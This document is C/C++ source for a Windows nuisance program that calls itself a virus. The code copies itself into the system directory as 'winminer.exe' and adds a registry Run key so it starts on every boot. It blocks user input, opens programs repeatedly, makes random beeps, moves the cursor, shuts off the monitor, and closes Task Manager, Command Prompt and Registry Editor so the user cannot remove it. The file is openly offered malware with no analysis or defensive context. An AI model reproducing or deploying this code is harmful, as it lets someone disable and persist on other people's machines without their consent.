char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";
void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();
DWORD WINAPI DestroyWindows(LPVOID);
int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot"; Sleep(1000); ShowWindow(mywindow, false); } void Run( int ID ) { if( ID == 1 ) { BlockInput(true); } else if( ID == 2 ) { Beeper(); } else if( ID == 3 ) { OpenStuff(); } else if( ID == 4 ) { Hibernation(); } else if( ID == 5 ) { CrazyMouse(); } else { BlockInput(true); Beeper(); OpenStuff(); CrazyMouse(); } } void Beeper() { Freq = rand()%2001; Dur = rand()%301; Beep( Freq, Dur ); } void OpenStuff() { ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE); ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE); ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE); ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE); } void Hibernation() { Sleep(1000); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); } void CrazyMouse() { X = rand()%801; Y = rand()%601; SetCursorPos( X, Y ); } DWORD WINAPI DestroyWindows(LPVOID) { while(1) { TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
Sleep(10);
}
}
